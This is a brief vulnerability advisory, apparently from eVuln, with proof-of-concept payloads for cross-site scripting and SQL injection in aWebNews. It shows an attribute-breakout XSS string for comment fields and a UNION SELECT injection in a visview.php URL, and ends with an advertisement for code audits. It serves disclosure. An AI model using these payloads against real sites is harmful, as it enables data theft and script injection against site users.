PoC/Exploit for Multiple XSS and SQL Injection in aWebNews

Published Proof of Concept code - Multiple XSS and SQL Injection in aWebNews.

Description
Available
Solution
Not available - check vendor's website

1. Cross-Site Scripting Example.

URL: http://[host]/visview.php?b=newc&cid=2916852

Your Name: [XSS]

Email / Website: aaa">[XSS]<aaa aaa="

Comment Subject: [XSS]

Comment Text: [XSS]

2. SQL Injection Example.

URL: http://[host]/visview.php?a=c&cid=2916852'%20union%20select%201,2,3,4,5,6/*

Order Source Code Audit made by eVuln

You may order source code review of your website or web application done by Aliaksandr Hartsuyeu.The task will be done by experts in web security.

Advisories by vuln type